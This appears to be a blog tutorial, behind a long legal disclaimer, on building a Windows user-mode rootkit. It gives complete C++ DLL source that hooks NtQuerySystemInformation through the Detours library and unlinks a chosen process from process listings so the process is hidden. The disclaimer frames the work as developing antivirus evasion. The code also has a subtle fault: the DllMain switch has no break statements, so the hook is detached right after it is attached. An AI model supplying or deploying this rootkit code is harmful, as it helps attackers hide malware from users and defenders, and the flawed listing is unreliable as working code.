This document and all associated materials are provided strictly for legitimate security research, education, and authorized antivirus detection capability testing purposes only. The techniques and concepts described herein involve advanced software security, malware analysis, and development methods, and any unauthorized use, reproduction, distribution, or malicious deployment against systems without explicit permission is strictly prohibited.

By accessing and utilizing this material, you acknowledge and agree to comply with all applicable laws and regulations, and to obtain proper authorization before conducting any security testing or research activities.

The author and affiliated parties expressly disclaim all legal liability and responsibility for any misuse, unauthorized actions, or damages arising from the use of this information.

Furthermore, this research was conducted to study current antivirus detection limitations, develop evasion techniques for educational purposes, and enhance cybersecurity expertise. The disclosure of this technology is purely for advancing the security industry and academic research.

Therefore, all risks, legal responsibilities, and consequences resulting from the use or misuse of this document rest solely with the user. The author and related parties are fully indemnified from any direct or indirect damages.

By reading or using this document, you are deemed to have accepted all the above conditions.

How does a user mode rootkit work?#

A user-mode rootkit typically works by injecting a DLL (Dynamic Link Library) into the target process, hooking the APIs that the process calls, and removing specific information from the actual return values. Rootkits mainly hide information about processes, network activity, files, the registry, etc., to avoid detection.

How to hide a process information?#

The NtQuerySystemInformation API is a Windows native API that returns information about the processes present on the system.

1
__kernel_entry NTSTATUS NtQuerySystemInformation(
2
  [in]            SYSTEM_INFORMATION_CLASS SystemInformationClass,
3
  [in, out]       PVOID                    SystemInformation,
4
  [in]            ULONG                    SystemInformationLength,
5
  [out, optional] PULONG                   ReturnLength
6
);

1
NTSTATUS NTAPI Hooked_NtQuerySystemInformation(
2
    ULONG SystemInformationClass,
3
    PVOID SystemInformation,
4
    ULONG SystemInformationLength,
5
    PULONG ReturnLength
6
);

SystemInformation (of type PVOID) returns information about processes. You can cast it to the existing PSYSTEM_PROCESS_INFORMATION type and, from each process entry, read the process name via ImageName.Buffer (a PWCHAR inside a UNICODE_STRING). Using that, you can filter out specific process names from the process list and return the filtered result. So when a DLL-injected process calls NtQuerySystemInformation, it will not see those filtered process names.

How to hook a function?#

The Detours library is a Windows library that enables hooking specific functions. Using it, you can hook native APIs and modify their results or record (log) them.

1
vcpkg install detours
2
vcpkg integrate install

Using the vcpkg tool, you can automatically include C++ header files and library files in Visual Studio 2022. In the case of Detours, the header file is located at detours/detours.h.

1
#include <detours/detours.h>

How to make a user mode rootkit?#

The completed DLL source code is as follows:

1
#include "pch.h"
2
#include <detours/detours.h>
3
#include <Windows.h>
4
#include <winternl.h>
5
#include <Psapi.h>
6

7
#pragma comment(lib, "detours.lib")
8

9
using namespace std;
10

11
const wchar_t* TARGET_PROCESS = L"Notepad.exe";
12

13
typedef NTSTATUS(NTAPI* NtQuerySystemInformation_t)(
14
    ULONG SystemInformationClass,
15
    PVOID SystemInformation,
16
    ULONG SystemInformationLength,
17
    PULONG ReturnLength
18
);
19
static NtQuerySystemInformation_t _NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(
20
    GetModuleHandle(L"ntdll.dll"),
21
    "NtQuerySystemInformation"
22
);
23

24
NTSTATUS NTAPI Hooked_NtQuerySystemInformation(
25
    ULONG SystemInformationClass,
26
    PVOID SystemInformation,
27
    ULONG SystemInformationLength,
28
    PULONG ReturnLength
29
) {
30
    NTSTATUS result = _NtQuerySystemInformation(
31
        SystemInformationClass,
32
        SystemInformation,
33
        SystemInformationLength,
34
        ReturnLength
35
    );
36

37
    if (SystemInformationClass == 5 && result == 0 && SystemInformation != nullptr) {
38
        PSYSTEM_PROCESS_INFORMATION processInfo = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
39
        PSYSTEM_PROCESS_INFORMATION prevInfo = nullptr;
40
        while (processInfo->NextEntryOffset || processInfo->UniqueProcessId) {
41
            bool hidden = false;
42
            if (processInfo->ImageName.Buffer != nullptr &&
43
                _wcsicmp(processInfo->ImageName.Buffer, TARGET_PROCESS) == 0) {
44
                hidden = true;
45
            }
46

47
            if (hidden && prevInfo != nullptr) {
48
                if (processInfo->NextEntryOffset == 0) {
49
                    prevInfo->NextEntryOffset = 0;
50
                }
51
                else {
52
                    prevInfo->NextEntryOffset += processInfo->NextEntryOffset;
53
                }
54
            }
55
            else {
56
                prevInfo = processInfo;
57
            }
58

59
            if (processInfo->NextEntryOffset == 0) break;
60
            processInfo = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)processInfo + processInfo->NextEntryOffset);
61
        }
62
    }
63

64
    return result;
65
}
66

67
BOOL APIENTRY DllMain( HMODULE hModule,
68
                       DWORD  ul_reason_for_call,
69
                       LPVOID lpReserved
70
                     )
71
{
72
    switch (ul_reason_for_call)
73
    {
74
    case DLL_PROCESS_ATTACH:
75
        DetourTransactionBegin();
76
        DetourUpdateThread(GetCurrentThread());
77
        DetourAttach(&(PVOID&)_NtQuerySystemInformation, Hooked_NtQuerySystemInformation);
78
        DetourTransactionCommit();
79
    case DLL_THREAD_ATTACH:
80
    case DLL_THREAD_DETACH:
81
    case DLL_PROCESS_DETACH:
82
        DetourTransactionBegin();
83
        DetourUpdateThread(GetCurrentThread());
84
        DetourDetach(&(PVOID&)_NtQuerySystemInformation, Hooked_NtQuerySystemInformation);
85
        DetourTransactionCommit();
86
    }
87
    return TRUE;
88
}

The code iterates through the process information using NextEntryOffset when handling the hooked function. It compares ImageName.Buffer with the target process name, and if they match, it manipulates NextEntryOffset to remove the entry from the list so it links directly to the next process. (Current target process name is Notepad.exe. Change the TARGET_PROCESS value to set the target process to hide)

Conclusion#

In conclusion, the user-mode rootkit is injected into the target process as a DLL. After injection it hooks NtQuerySystemInformation, examines ImageName.Buffer in the PSYSTEM_PROCESS_INFORMATION structure, and if it matches a process that should be hidden, it modifies NextEntryOffset to remove that process from the list and link directly to the next entry to prevent the process from being seen.